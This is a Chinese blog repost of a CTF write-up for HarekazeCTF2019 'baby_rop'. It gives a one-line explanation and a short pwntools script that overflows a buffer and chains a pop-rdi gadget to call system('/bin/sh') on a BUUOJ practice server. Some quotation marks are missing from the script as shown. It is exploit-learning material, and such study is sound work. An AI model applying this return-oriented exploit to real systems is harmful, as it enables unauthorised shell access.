首页 > 其他 > 详细

[HarekazeCTF2019]baby_rop

时间:2020-02-10 13:00:23      阅读:560      评论:0      收藏:0      [点我收藏+]

程序已经给了system和binsh ,用寄存器传参就可以了

from pwn import *

r=remote(node3.buuoj.cn,25737)
elf=ELF(./babyrop)
system_addr=elf.symbols[system]
binsh_addr=0x601048
rdi_addr=0x400683

payload=a*0x10+b*0x8+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef) #system(/bin/sh)
r.sendline(payload)

r.interactive()

 

[HarekazeCTF2019]baby_rop

原文:https://www.cnblogs.com/gaonuoqi/p/12290099.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!